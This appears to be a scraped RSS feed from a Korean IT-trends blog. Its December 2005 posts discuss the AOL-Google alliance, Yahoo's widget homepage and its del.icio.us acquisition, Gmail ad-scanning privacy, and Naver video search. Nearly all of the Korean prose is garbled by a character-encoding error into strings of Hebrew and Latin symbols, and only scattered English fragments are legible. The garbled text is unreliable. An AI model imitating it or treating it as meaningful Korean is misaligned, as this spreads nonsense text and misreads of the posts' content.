    -±׳·¸´¸י ¿©±ג¼­ ַׁ°¡ֱצ ±ֳ±ֱץְּ »‎±ה´. °ֻ»צµµ ְּ¸ְְּֿ³× ¹ּµנ¾מ¿ֽ °°ְּ ֱַ¶ףְּ¹צ½ֳ³× ¹ּµנ¾מ °·ֳ ¹‎ֱ¦µµ¸¦ ¹¾ֶµי¿©¾ַֿ³×¶ף´ֲ °ְּֽ´. ְּ¿¡ ´כַ״ ַֿ¹צµו ·־½÷ִנ ¹צֵ©¸¸ ¼¾ֵֽ(Berkman Center for Internet & Society)¿¡¼­´ֲ ֳײ± Regulating Search¿¡ ´כַׁ ³םְַ°¡ ֱרַאµַ°ם ְײ¾מ ְּ ֲ ³»¿כµיְ» µי¿©´÷¸¸י ÷¹ְגֱַֿצ¸¸ ³×¸§ ½ֵ¼±ַׁ ½ֳ°¢µיְ» ֱ¢ַׂ ¼צ ְײְ¸¸®¶ף ÷»´. °ֻ»צ¿£ֱרְּ ֱ₪÷¸ְַ ֱ¢±°ת °ב°ת¸¦ ֱִֶ®·ַֿׁ°ם ½ֱֹצ¾מ ¸¼¼ֱצְַ ±¸¼÷¿¡ °¿©ַׂ ¼צ ְײ´¸י, ¶ַַׁ °ֻ»צ¿¡ ´כַׁ µ¶ֱ¡¿¡ ´כַׁ ÷־÷׀ְ÷ ¾מ¶»°װ ¹¶ף÷ֱ¾ ַֿ´ֲ°¡ְּ´.
    -
    -¿ה ¹·־ ְ ֶק½÷ֳֶַׁ ±¸±°ת AOLְַ ֱ¦ָ °ַ°ת °ֻ»צ ´כ»ףְַ ָ®ְוְ÷ ´ְ½ְַ ¿¬»ףְ¿כְ» ְְֿ¸ֵ²´. ±¸±ְּ TiVo³× ְִֹּ÷ם TVְַ EPG(Electronic Program Guide) ¿×ְַׂ» ַֿ°װ µָ´¸י...
    -
    - - ]]> -
    - ¸ײֶ¼¹ּµנ¾מ - Thu, 29 Dec 2005 04:55:18 GMT -
    - - <![CDATA[ AOLְַ ±¸± ¼±ֳֵ ±׳ ְ·«ְ ֱ¦ְַָ ¹ט°ז ]]> - http://ittrend.egloos.com/2058462 - - -
    -ֲ°ם·־ ±׳ ´ח½ֳ AOLְ÷ ֱ´כַׁ ְָ¯ ½ֳ±ג¸¦ ¸ְֲַּֿ°ם ְײ¾ת´. ´ְּ¾ף ¾ק °¡ְװְ¸¦ ´כ»ףְ¸·־ ְ־ֵֽ³ ¼­÷ס½÷¸¦ ְ־ֵֽ³ ¾קֳ¼ ´הֱצ ¾°װ ֱ¦°רַֿ´ר ְּ ָ¸»ח°¡ ְ־ֵֽ³ ÷סֱמ´ֿ½÷ְַ ֲ ¸ְ(ֶ¯ָק ±₪°ם ÷סֱמ´ֿ½÷)ְ» ¾ֻ±ג ½ְֳַֿ¸י¼­ ¿ֲ¶ףְ־ ¹ּµנ¾מ ָ¸»ח·־ְַ ÷»ֱתְ» ֳ£¾ֶ°¡´ר ְֲּ¾ת±ג ¶§¹®ְּ´. ±׳·± ¿ֱֽ¿¡ ְ¥·־±׳µµ ְ־¼צַֿ¿´°ם ¹ּµנ¾מ ָ¸»ח·־ ±»ָק±ג¸¦ ½ְֳַֿ¸ח ֵץְ±ְּ ַ¿הַֿ°װ µַ¾ת´.
    -
    -ְּ¿¡ AOLְ÷ ְ½ְֵַ ֱצ÷׀ °ר°³¸ֵµµ ¹׳ ִֶֶ®³½±¿¡ ´כַׁ ְַ»ח¸¦ ַ¥¸םַ°ם, AOLְּ °¡ֱצ°ם ְײ´ֲ ֶ®·¡ַָ°ת ֱֳִֵקµיְּ ֵ½³×±ג ½ְֳַ´ר MS´ֲ ֶ¯ָק AOLְַ °ֻ»צ¿£ֱרְ» ±¸±¿¡¼­ ְ»חְַ ¿£ֱרְ¸·־ ¹²±ג ְ§ַ״ °¡ְו ְ±״ְְ¸·־ ְ־¼צ ¹°¹״ְ¾ק¿¡ µי¾מ°¬´. ±׳·¯´ר ֱ ¹ַ¥ ְ°¡ֱצ MS´ֲ AOL ִֶֶ®³ְַ °¡ְו °­·ֲַׁ ִָ÷¸¶ף´ֲ ´÷½÷°¡ ¶°µ¹°װ µַ¾ת´. [ֱֲ¶: MS-AOL, ¿ֲ¶ףְ־ ±₪°ם ֱ¦ָ ְֳ׀±ג]
    -
    -±׳·¯°ם ¸חִ¥ ִָ AOLְ÷ °ב±¹ ְ·«ְ ֱ¦ְַָ °¡ְו ´¼רַֿ¸י¼­µµ ֵ¬¸®¾מַׁ µ¿±גְ־ ½ֳ³ֱצ(Synergy)¶ץ ´¾מ¸¦ ¾ָ´´ֲ µםְּ MS¸¦ ¹צ¸®°ם ±¸±ְ» ֳֵַ´. ±׳·³ ¹«½¼ ½ֳ³ֱצ°¡ ְײְ»±מ´ֲ ´ְ½ [AOL and Google to Expand Strategic Alliance]ְ» ֲ°םַֿ¸י ֱ» ´ץ °¡½ְְֳ¸·־ ÷¼ ¼צ ְײ°ם ¿ה¾אַֿ¸י ¾ֶ·¡¿ֽ °°´.
    Benefits for AOL
    -- Creating an AOL Marketplace through white labeling of Google's advertising technology.
    -- Expanding display advertising throughout the Google network.
    -- Providing AOL marketing credits for its Internet properties.
    -
    -Benefits for Google
    -- Making AOL content more accessible to Google Web crawlers.
    -- Collaborating in video search and showcasing AOL's premium video service within Google Video.
    -- Enabling Google Talk and AIM instant messaging users to communicate with each other.
    -
    ¹°·׀ ְ§ְַ ½ֳ³ֱצ ָ¿°ת´ֲ ¸» ±׳´כ·־ ¸סַ¥·־ ַֿ´ֲ ָ¿°תְֱּצ ±׳°ְּֽ ½ֱַ¦ְְ¸·־ ¿מ¿µµַ¸י¼­ ÷ת°װµֹ ¸¶ֲ°ת ½ֳ³ֱצ¸¦ ָו¶·¯³ץ´ֲ ¿÷־ ÷¯¼צµיְ÷ ַ׳»ף ֱ¸ְחַֿ±ג ¸¶·ְֳּ´. ±׳·¡¼­ ְֿ÷־ ְ¹®°¡µיְ÷ ½ֳ³ֱצ ָ¿°ת°¡ ±׳¸® ³פֱצ ¾ְ»ֱצ ¸נ¸£°ם ְּ¿¡ MS¿ֽ ¾ִָ´ֲ ±׳¸® ֵ¸°ְ» ¹ֱצ ¾ְ» °ְּֽ¶ף´ֲ ְ¸ֱ±מֱצ ³»³ץ°ם ְײ´.
    -
    -±׳·³ ´½ֳ ֱ₪¸®ַ״ ÷¸¸י, AOLְ÷ ְח¹«ְ ¾ֱָ₪¼÷ְ» ָ®÷¸ַ´¸י(10¾ן´·¯³× ¹¾ׂ°ם ±¸±ְַ ±₪°ם ְ־÷¥ֵה¸®¸¦ ָ°¿כַׂ ¼צ ְײְ¸´ֿ), ±¸±ְ÷ AOLְַ ֱֳִֵק ֶ¯ָק ÷סµנ¿ְ ֱֳִֵק¸¦ ֵ©·ׁ¸µַׂ ¼צ ְײ´´ֲ ְּµז ¸»°ם´ֲ ¾רְ»±מ? ±׳·¸´¸י ±¸±ְּ ֱֳִֵק ֵ©·ׁ¸µ ַֿ·ֱ°ם AOL ¸½ְֵת¿ֽ ָ£ָ¯ַֿ·ֱ°ם 10¾ן ´·¯³× ½טְ»±מ? ±¸±ְ÷ ְּ¹ּ ¿£ֱצ´ֿ¾מ ֱ‎´ְ» ֵ»ֱַַַׁצ ¿ְ·¡ְּ¸ח ֳ¶ְתָק ÷סֱמ´ֿ½÷ְְּ´. ¹°·׀ ±׳µיְַ IPO °תֱ₪ְ» ÷¸¸י ´ץ¿ם ±׳·± ַגְּ ַ³±גֱצ¸¸..
    -
    -½±°װ ¾ך±גַֿ¸י ±¸±ְ÷ 2008³ג±מֱצ AOLְ» ֵ°¿צ¼­ ְ±גµיֳ³·³ IPO ַֿ°װ ַׁ ´ְ½ ±׳ ְ÷» ְּµזְ» ¸סַ¥·־ ַֿ°ם ְײ´ֲ °ְּֽ´. [ֱֲ¶: ±¸±, AOL¿¡ 2008³ג ±ג¾ק°ר°³ ֲר¼צ ¿ה±¸] ֱן ְ·«ְ ֱ¦ָ´ֲ ½ֳ³ֱצ¶ף´ֲ µ¿±גµµ ְײֱצ¸¸ °ב±¹ ֱײֱײ¿¡°װ ְּµזְּ µַ´ֲ ±ֳ±״ְְ־ ¸סְְ» ֱצ´ֿ°ם ְײ´. ±¸±ְ÷ AOLְַ ְבְח °¡ִ¡¸¦ ְ־ֱ₪ַׁ ¼ְְּ°ם ֵ°¿צ¼­ ±׳ ¸מ ¹ט·־ µַµ¹·ֱ ¹°´´ֲ ¾¹«ֱר °ט¾אְ» ֳ¼°בַׁ °ְּֽ´. Benefit for Bothְ÷ °ב±¹.. Financial Synergy, ֱן "Recapitalization"¶ף ÷¼ ¼צ ְײ´.
    -
    -(ֲ°ם·־ AOLְ÷ 3³גְ ±¸±°תְַ °ֻ»צ ¿£ֱר ±₪°ם °ט¾א½ֳ ÷ס»ףְוµָ ±¸± ֱײ½ְִ¸·־ ¹¾ׂ´ר ¿מְֱֱ÷ ¼צַ‎ְְּ±גµµ ַֿ´. :-))
    -
    -ֶק½÷ֳִֶָ ֳ°¡ֱ₪÷¸
    -Google Can Force AOL IPO
    -Time Warner Permits Google To Sell AOL Stake In 2008 - ]]> -
    - °ז¿µְ·« - Mon, 26 Dec 2005 13:43:35 GMT -
    - - <![CDATA[ ´ְ½ ִֵֽ¡ ¸½ְֵת ְ§ֱ¬ ]]> - http://ittrend.egloos.com/2046512 - - 12¿ש 6ְֿ°זְ־°¡ ³¯ֲ¥´ֲ ¸םָ®ֱַֿר ¾ֱצ¸¸ ´ְ½¿¡¼­ ¸½ְֵת¸¦ ¾ק±׳·¹ְּµוַֿ¿© ³»³ץ¾ׂ´. ¾ְֶּ´÷½÷¿¡¼­´ֲ '¸ײֶ¼¹ּµנ¾מ ָ¯°זְ¸·־ ְ° °³ֶם'ְּ¶ף´ֲ ´¼ׂ »‎¶׳ ¸ְֲ÷ ֵ¸ְֶּ²·־ ¼ׂ°³¸¦ ַ´ֲµ¥ ¿©ֶַֿ° ¸½ְֵת¿¡ »לֲ¦ִפ °½ְֹ» ¾ס¾מ µ־°ם ְײ´ֲ ְַ¿¡°װ´ֲ ¹°¡¿מ ¾ק±׳·¹ְּµו ¼ׂ½ְִּ¾ת´.

    ְֿ´ ְּ¹ר ¾ק±׳·¹ְּµו´ֲ ¸½ְֵת, ֳ₪ֳֶ, ְִֶֿ°רְ¯¶ף´ֲ 3°¡ֱצ ֳאְ¸·־ ְ־ֵֶֽהְּ½÷¸¦ ְ¸י °³ֶםַֿ¿´ְ¸¸ח ֳַ·־ֳֶ(Floating) ¹ז½ְִ» »ח¿כַֿ¿© »ח¿כְµיְַ ֱִֶ®·ׁ ְְ¯µµ¸¦ ³פַ´´ֲ ֱ¡ְ÷ ְ־»ףְְּ´. ±׳¸®°ם ¹«¾ש÷¸´µµ ַ״¿¿¡¼­´ֲ ¸» ¸¹´ר ֱַֿצ¸¸ ±¹³»¿¡¼­´ֲ ¿עֱקְ׃ְּ ְתֱ¶ַ´ר ְ§ֱ¬(Widget)ְ» ¸½ְֵת¿¡ ³¢¿צ ³ײ¾ת´. ַצְח ´·ֲ, ½ֳ°ט, ֵ¸ְּ¸׃, ³¯¾¾, ¿µ¾מ»חְ, °ט»ך±ג µמ ֵכ»ף ְ§ֱ¬ְ» ¾²°ם ְײ´ֲ ְ¯ְתµיְּ¶ף¸י Picture Frame ¸»°ם´ֲ ´כ÷־÷׀ ¾ײ¿כַֿ´ֲ ְגµ¿»ח´ֿµיְ» ֱ¦°רַֿ°ם ְײ´.[ֲ°ם: ¾ִָ ְ§ֱ¬]

    ַוµ¥ ¿©±ג¼­ ֱ» ´ץ ¾ך±גַ״ ÷¼ ²¨¸®°¡ ְײ´. ³׳ְּ¹צְַ ¸ְ־ָ­¸י¿¡ ÷ְ÷ ְ§ֱ¬°ת ±¸± °³ְ־ָ­ ָ¨ֶהְֱּצ¿¡ ÷ְ÷ ¸נµג(Google Modules)°ת ´ְ½ ִֵֽ¡ֳ³·³ ¸½ְֵת¿¡ ÷ְ÷ ְ§ֱ¬ְ÷ ְ§ֱ¬ ÷»¿¬ְַ °¡ִ¡ְ» ֳזֱ·½ֳִׁ ֱײ°ם ְײ´ְ³ְִּ´. °³ְ־ְַ ֲ¿©¸¦ ְ¯µµַֿ¿© ¾חֱתְַ ¸¹ְ÷ ְ§ֱ¬µיְ» ¹«·ב·־ ֱ¦°רַֿ±ג ְ§ַ״ ¿ְֲַ ±¸ֱ¶¸¦ °¡ֱ®°¡´ְ³ִ ±׳·¸°װ ַװְ¸·־½ב ¾מֳַ¸®ְִֹּ¼ְַּ ¾ֶ´ֿ¶ף ֳַ·§ְֶַ ֲֵַ¸¦ ¶ח°ם ְײ´ְ³ִ¿¡ ´כַׁ ֱת¹®ְ־ °ְּֽ´.

    ¿©ֶַֿ° ´ְ½ ִֵֽ¡´ֲ µ¿ֱ¢¿¡ ´כַׁ ¾׀¹ ַ״°בְ» »ח¿כְµיְ» ְּ÷¥ֶ®(¸¶ְֿ¸®ֱצ·־ °זַ° ֱײ±ג)·־ ²ר¾מ¸נְ¸·ֱ°ם ַ´ר ±גֱ¸ְַ ¹ז½ִ¿¡¼­ ¹‏¾מ³× »ח¿כְµי¿¡°װ ְ¯¿כַׁ ְ¯ֶ¿¸®ֶ¼¸¦ ֱ¦°רַװְ¸·־½ב ַ״°בַ״ ÷¼·ֱ°ם ַ´ר °ַ ¾ֶ´ׂ±מ? ¸½ְֵתְַ Lock-in ְ÷ ¾מ¶»°װ ַ®¾מ³¾ ¼צ ְײְ»±מ?


    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -¾קµ¥ְֶּ® : ¼ׂ½ְִ÷ ְּ¹ּ µי¾מ¼­ ¾ֻ¾ֱׂצ¸¸, ³׳ְּ¹צ¿¡¼­ °ב±¹ ְ§ֱ¬ְ» ¿ְֲַַֿ´ֲ±÷¿ה. ³׳ְּ¹צ µ¥½÷ֵ©ֵי¡¯÷£ֵ¸ֵ׳½÷ֵֽ ¸נֱ‎ - ]]> -
    - ½ְֳוµ¿ַג - Thu, 22 Dec 2005 06:05:51 GMT -
    - - <![CDATA[ ַׁ¸ְֿ°ת ¹ּ´ָֿ¨ַַ¿¡ ±₪°ם¸¦ ÷ָש´¸י ]]> - http://ittrend.egloos.com/2029682 - - -
    -ֱַֿצ¸¸ ±׳µיְ÷ ְּ»ףַֿ°װµµ Gmail °טֱ₪ְ» ְֱֿ¾ְַ ִֶµµֵ¸±ג ֲֵַ·־ »ׁ¸®±ג ½ְֳַ´. Gmail ¸¶ִֵֹֽ°¡ ¼ׂ¼ָ ³׳ֶ®¿צֵ©, ְװ¼ׂ¹® ¸¶ֳִֶֹ ±ג¹‎ְ» ְ ¾ֻ°ם ָ°¿כַׁ °ֱַצ´ֲ ¸נ¸£°ְ¸³× ֱ» ´ץ ְּ½´°ֵ¸®°¡ µַµµ·ֿ ַֿ°ם, ¼­÷ס½÷¿¡ ´כַׁ »ח¿כְ ·־¿­ֶ¼¸¦ ½ֹ¾מֱײ±ג ¿¡´ֲ ְְ‎ַ´´ֲ ֶע°¡¿´´.
    -
    -ֱַֿצ¸¸.. ´½ֳ ÷»·׀ְ¸·־ µ¹¾ֶ°¡¼­ ¿ײ ±¸±ְ÷ ¸ְֿ¿כ·®ְ» 1G ¾¿ְּ³× ֱ¦°רַׂ »‎°¢ְ» ְַ»±מ?¶ף´ֲ ְַ¹®ֱ¡ְ» °¡ֱת ¼צ ְײ´. ְּ¿¡ ´כַ״ ְּ¹ּ ´כֱָ­µָ ¸ְְּֿ¶ף´ֲ ¼­÷ס½÷¸¦ ±¸±ְּ ¾ֱֶײ µ´°װ ֱ¦°רַׁ´°ם ַ״¼­ ½±°װ »ח¿כְµיְּ ³ׁ¾מ¿ֳ¸® ¾ר±ג ¶§¹®¿¡ ִֶ°ְְ־ ¼­÷ס½÷·־ ¿כ·® ָ®´כ¸¦ ֳֵַ´°ם ÷¸¸י µֹ±מ? ¸¹ְ÷ ְּµיְ÷ ¸ְֿ°ת ¸½ְֵת ¸¸ֵ­ Lock-in(¶פְ־)ָ¿°ת°¡ °­ַׁ ְ¥¼­÷ס½÷´ֲ ¾ר´°םµי ¹ֿ°ם ְײֱצ ¾ְ÷°¡? ¿©ֶַֿ° 1G ¿כ·® ֱ¦°רְ» ְֱֿ¾ְַ ֱַ·־¸נ¼ְַ¸·־ ִ¡÷־ַֿ±ג¿¡´ֲ ´¼ׂ ÷ס³ם¸®ְְ¸·־ »‎°¢µָ´.
    -
    -ְּ¿¡ ´כַׁ ְְַַ »‎°¢ְ÷ ±¸±ְ÷ ְּ¸ְְֿ» »ח¿כְµיְַ ֱ₪÷¸ ְתְו ֳ¢°ם·־ ¹¶ף÷¸¾ׂ±ג ¶§¹®¿¡ ¿כ·® ָ®´כ¿¡ ´כַׁ ¹»ףְּ ³×¿װ´°ם ÷¸°ם ְײ´. ֱן ְּ¸ְְּֿ ±גֱ¸¿¡ ÷סµ¿±גְ ִ¿¹ֲ´ְִֹּֿ¼ַ µµ±¸¿´ְ¸³× ֱ¡ֲק ִ¿¹ֲ´ְִֹּֿ¼ְַ» ³ׁ¾מ ֱֳִֵק(¹°·׀ ִ¿¹ֲ´ְִֹּֿ¼ַ ·־±׳¸¦ ֶקַװַ״¼­)¸¦ ¾ִֶ«ְּ÷שַֿ°ם °¸®ַֿ´ֲ °ְֽ¸·־ »ח¿כַׁ´´ֲ ֱ¡¿¡ ±׳µיְ÷ ֱײ¸סַׁ °ְּֽ´. ±׳·¸°װµַ¸י ְ¿¬ָק °ֻ»צ°תµµ ¿¬°בµַ´ֲ ֳַ·§ְֶּ µַ´ֲ °ְּֽ°ם °ֻ»צְ÷ ¶ַ ´½ֳ ±׳µיְַ ¼צְֽ¿רְ־ ±₪°ם·־ ְּ¾מֱצ´ֲ ·חֶ®¸¦ ֱ¦°רַֿ±ג ¶§¹®ְּ´.
    -
    -±׳·¸´¸י ¸ְֿ¿¡ ÷ָש °ֻ»צ ְּ¾±ג¸¦ ַ״÷¼±מ? ¿ײ Gmail »ח¿כְµיְ÷ ±¸±ְּ ְ±ג °³ְ־ְַ ¸ְֿ ³»¿כְ» ֲ¿ם ְ׀¾מ÷¸°ם ְּ¿ֽ °·ֳµָ ±₪°ם¸¦ ³»÷¸³»´ֲ °¨½ְֳ¿¡°װ ÷סָ£°¨ְ» °®ֱצ ¾´ֲ°ֹ±מ? ¿ְָק·ֱ ָ£ְְְַּ¶ף°ם ַ״¾ַֿ³×.. "¸¸¾א ±¹³»¿¡¼­ Daum ַׁ¸ְְּֿ ְּ·¯ַׁ ¼­÷ס½÷¸¦ ³»³ץ¾ׂ´¸י »ח¿כְµיְַ ¹ְְְ÷ ¾מ¶°ְַ»±מ?"
    -
    -±¸±ְַ ¼­÷ס½÷¸¦ ְּ¿כַׂ ¶§ °ת¿¬ ¿ל¸®´ֲ ÷פ·ֱ¾´´´ֲ ְבְחְַ½ִ ¼׃¿¡ ¾²°ם ְײ´ֲ °ְֽֿ±מ? ¼ְׂ¯ֱײ´ֲ ±¸±ְּ°ם ³×´ֲ ֶע»‎ ÷פ·ֱ¾²´ֲ »ח¿כְ´ֿ ¿ל¸®°¡ ±¸±¿¡ ¹¶צ ¼צ ְײ´ֲ °ְֽ÷ "´ץ ¸¹ְ÷ °ֽµיְ» ´ץ ַ³÷־ַֿ°װ °רֲ¥·־ ¾²°װ ַ״ֱײ½ֳ°ם, ´¸¸ ֱ¦ ¸ְֿ, ÷ם·־±׳, ¸½ְֵת, ±׳¸®°ם ֱ¦ PC¿¡ ְײ´ֲ µ¥ְֵּֽµיְ» °¡ֱצ°ם ³×» ֱ‏?¸¸ְ÷ ֱַֿצ ¸¶¼¼¿ה." ¶ף´ֲ »‎°¢ְ» °®°ם ְײ´ֲ°ֹ±מ?
    -
    -³» PC¿¡ ְײ´ֲ µ¥ְֵּֽ(ְִֶֿ)¿ֽ ¸ְֿ, ¸½ְֵת, ְָ­³»¿כ, ÷ם·־±׳, ¹ּ´ָֿ¨ַַ, °װ½ֳֶַ¿¡ ¿ֳ¸° ± µמ.. ¼ְׂ¯±ַ¿¡ ´כַׁ ְ־½ִ ¼צֱ״ְ÷ ÷׀¸ם ´¸¦ °ְּֽ´. ±׳·±µ¥ ±¸±ְ÷ ְת ¸נµח °ֽ¿¡ ±₪°ם¸¦ ³ײ°ם ְײ´ֲµ¥..÷°´¸¥ ¾ֶָ¼ ¹ְְְ÷ ÷¸ְֱּצ ¾°ם ְײ´´ֲ ֱ¡ְּ´.
    -
    -¸¸¾א ½־ְּ¿שµו¿¡¼­ »ח¿כְ¿¡°װ ´ְ½°ת °°ְ÷ ֱ¦¾ְָ» ַׁ´¸י ¾מ¶² ¹ְְְּ ³×¿ֳ±מ? "¹ּ´ָֿ¨ַַ ַׁ ֲ ±¸¼®¿¡ °·ֳ ±₪°ם¸¦ ½ֶ°װ ַ״ֱײ¸י ¸ֵ´ µµֵה¸® 00°³¸¦ µו¸³´ֿ´." µµֵה¸® ¼צְװ÷¸´ ´ץ ±¦ֲתְ÷ ±₪°ם ¼צְְּֽ ³×¿ֳ±מ ¾ֶ´ֿ¸י ¿×ָ¿°ת·־ »ח¿כְµיְּ ¹ּ´ָֿ¨ַַ¸¦ ¹צ¸®°װ µֹ±מ?
    -
    -¹ּ´ָֿ¨ַַ¿¡ ְײ´ֲ ³»¿כְ» ½÷ִ³´׳ַ״¼­ ¿·¿¡ ±₪°ם¸¦ ½ֶ´ֲ °ֽ°ת ÷ם·־±׳¿¡ ְײ´ֲ ³»¿כְ» ½÷ִ³´׳ַ״¼­ ±₪°ם¸¦ ½ֶ´ֲ °ֽ¿¡´ֲ ¾מ¶² ֲקְּ°¡ ְײְ»±מ? ´¼רָק ֱ₪÷¸³ִ ¶ףְֱַּ ·־±׳³ְִַ ¼צֱ״ְ÷ ¾ֶ´ׂ °ְּֽ´. ±׳ ְְּ¯´ֲ ¸ְְֿ» ÷¸¸י ¾ֶ´ׂ °ֽ °°´. ±׳·¸´¸י ¼­÷ס½÷ ְֳ¼ְַ Identityְֿ±מ? ֱ₪¸» »ח¿כְµיְ÷ ¡®¹ּ´ָֿ¨ַַ´ֲ ְ±ג²¨´ֿ±ס ½־ְּ¿שµו ֱ¶ֲקµµ °ַµי¸י ¾ָµַ¿ה¡¯ ¶ף´ֲ »‎°¢ְ» °¡ֱצ°ם ְײ´ֲ°ֹ±מ?
    -
    -
    - ]]> -
    - ¼­÷ס½÷ְ·« - Fri, 16 Dec 2005 08:44:36 GMT -
    - - <![CDATA[ Yahoo! Del.icio.us ְ־¼צ ±׳ ´ְ½ְ÷ ]]> - http://ittrend.egloos.com/2018393 - - -
    -ֱצ³­ 5, 6¿ש Flickr¿ֽ My Web 2.0ְ» ְ־¼צ, ·±ִ× ַׁ ִָ UCC Community¿ֽ UCC Searchְַ ±׳°£ ½ְְַ÷ »ף´חָק ´¶ת´. ¾ְִַָ Social Search Engineְ¸·־ »ן°םְ ַ´ר My Web 2.0ְ÷ ¿©ְָק ְֿ¹ ¾ִָ »ח¿כְµי¿¡°ױ »‎¼ַׁׂ »ףַ°ְּ¾תֱצ¸¸, Flickr´ֲ 9°³¿ש°£ 30¾ן ´·¯ְַ ¸ֳֵגְ» ±ג·ַֿֿ¸ח ¾ְִַָ ָ¿ְ°¡ µַ¾ת´.
    -
    -±׳·¡¼­ ¾ִָ´ֲ My Web 2.0¿¡ ֶק½÷¸¦ ÷ׂ¾מ³ײ¾מ ֱ ±׳ ¹«¾נ°¡¸¦ ֳ£¾ֶַ״¸ּ°ם ±׳°װ ¹·־ Del.icio.us¿´´ר°װ´. ֲ°ם·־ ¾ֶ·¡´ֲ µפ¸®¼ֵ½÷ ÷ם·־±׳¿ֽ ¾ִָ °ֻ»צ ÷ם·־±׳ְַ ְּ¹ר ְ־¼צ¿¡ ´כַׁ ¼ׂ°³±ְ־µ¥, ÷¸¸י ְ־¼צ ¸סְְּ ¶ׁ·ַַֿ°װ ÷¸ְ־´.
    Y.ah.oo!
    -We're excited to be working with the Yahoo! Search team - they definitely get social systems and their potential to change the web. (We're also excited to be joining our fraternal twin Flickr!)
    -
    -Yahoo Search Blog
    -don't be surprised if you see My Web and del.icio.us borrow a few ideas from each other in the future.
    -
    ±׳µ¿¾ָ »ח¶קµיְּ ֱ₪÷¸¸¦ ֳ£´ֲµ¥ ¾צֳ»³­ ½ֳ°£°ת ³כ·ְֲ» µיְּ°ם, ±׳·¡µµ ֱ₪ְ °·ֳ ְײ´ֲ ֱ₪÷¸¸¦ ¸רֳ£´ֲ °ְֽ» ÷¸°ם ±¸± ֳ¢¾קְ ·¡¸® ֶהְֱּצ, ¼¼¸£°װְּ°¡ One-Stop °ֻ»צ ¼­÷ס½÷(Finding Information)¸¦ ¼±÷¸¿´´¸י
    -
    -¾ִָ CEO ֵ׳¸® ½ֳ¸ב°ת °ֻ»צ ¸ג¹צµיְ÷ ±¸± °ֻ»צ°ב°ת¿¡ ¾א°£ ְַ¹®ְ» ַ°°ם »ח¶קµיְּ ¸¹ְּ °ַµו¸° ֱ₪÷¸¸¦ »ח¶קµיְּ ֱקֱ¢ ֳֳµַֿ´ֲ ֱ₪÷¸¸¦ ֱ¦°רַֿ´ֲ »צ´¸¥ ÷׀·ש °ֻ»צ ¼­÷ס½÷(Browsing Information)¸¦ ¼±÷¸ְּ·ֱַׁ´°ם ÷¸¸י µֹ±מ?
    -
    -ֳ½ֵ: ±׳ ´ְ½ְ÷.. ¼ׂ¼ָ ְּ÷¥ֶ® °רְ¯ ¼­÷ס½÷ְ־ ¾קִ¿¹ײְ» ¾מ¶»°װ ¼±÷¸ְֱֿצ, ¾ִָ ְ§ֱ¬ְ» ¾מ¶»°װ °¡²ד¼­ ³»÷¸³¾ֱצµµ ¿¹»ףַ״÷ֱ¾°´.
    -
    -Check Point: ¾ְִַָ ֲֵ±׳ ָ°¿כְ÷ ְֲֿקְְ¸·־ ´ח¿¬ָק °ֻ»צ¿¡ ָ°¿כµֹ °ְּֽ°ם, ´ְ½ְ÷ ¹·־ ְּ¹ֱּצ(with Flickr)¿ֽ ְּ÷¥ֶ®(with Upcoming) ¼­÷ס½÷¿¡ ֱ¢¸ס½ֳֵ³ °ְֽ¸·־ ÷¸ְ־´. ±׳ ´ְ½ְ÷ ְ½¾ַ, ¼מַ־, ÷סµנ¿ְ µמְ» ¼ר¼­·־ ¾ְִַָ ´¾חַׁ ֱֳִֵק ¼­÷ס½÷·־ ָ®ְו½ֳִׁ ³×°¥ °ְֽ¸·־ ¿¹»ףµָ´.
    -
    -* Related reference : Yahoo History updated - ]]> -
    - ³×ְַ½÷ֵה¸® - Mon, 12 Dec 2005 15:35:26 GMT -
    - - <![CDATA[ ³׳ְּ¹צ µ¿¿µ»ף°ֻ»צ ±׳¸®°ם ְ¯ֵכ ]]> - http://ittrend.egloos.com/2000695 - - ¼ׂ½ְִ÷ ±׳´ֱצ ³מ¶רֱצ ¾´. ְ־ֵֽ³ ֶקֵ׀ְ» ְ¯ֵכ¾קֳ¼¿¡ ±»ְּ ÷סְ¯ְַֿ¸י »ףַ°±¸»צְ» °®ֳ´ֲ °ְֽ־µ¥ ְּ´ֲ ¸ֵ¿ל ´ח¿¬ַׁ ½ַַאְּ´.(ְ·«µµ ¾ֶ´ֿ´.) ¹°·׀ »ףַ°±¸»צְַ ±םְּ¿ֽ ³÷ס¸¦ ֵ¸»ח ´כ÷ס ֲק÷°ָ­ַֿ¿© °זְן¿לְ§¸¦ °®ֳ´ֲ °ְֽ÷ ´¸¥ ¾ך±גֱצ¸¸ »ףַ°±¸»צ¸¸ְ» ÷¸¾ְׂ» ¶§´ֲ ±׳·¸´´ֲ ¾ך±ג´.
    -
    -(ֲ°ם·־ ְ־ֵֽ³ ֶקֵ׀ְ» ְ¯ֵכ¾קֳ¼¿¡ ÷סְ¯ַֿ´ֲ °ְֽ÷ ¹«¼±°ת °°ְ÷ ֵ¬·־ֱמ¸ֱ¿¡¼­´ֲ SKֵ·¹ִ°ת °°ְ÷ ³׳ֶ®¿צֵ© »ח¾קְ°¡ ְ¯ֵכ¾קֳ¼¿¡ ÷סְ¯µֹ ¼צ ְײֱצ¸¸, ¿ְֲַ¸ְֱ־ ְ¥¿¡¼­´ֲ ֶקֵ׀°ת °°ְ÷ ֳַ·§ֶ »ח¾קְ°¡ ֱ¦°ר¾קֳ¼(CP)¿ֽ »ח¿כְ »חְּ¿¡¼­ ֱֳִֵק¿ֽ ִ¿¹ֲ´ְִֹּֿ¼ַ ·־±׳¸¦ ְ¯ֵכ½ֳֵ°±ג ¶§¹®ְּ´. ְ־ֵֽ³ ֶקֵ׀ְ» ְ¯ֵכ¾קֳ¼·־ ÷¼ ¶§ ¾מ¶² ְ¯»חֱ¡°ת ¾מ¶² ¸ֵ¸ֶק¸¦ ²ר°ם ¿ֳ ¼צ ְײ°ם ¾מ¶² ֱרָ­°¡ ¿¹»ףµַ´ֱֲצ´ֲ ´ְ½¿¡ ±גָ¸°¡ µַ¸י ¼³¸םַ״÷¸±ג·־ ַֿ°´.)
    -
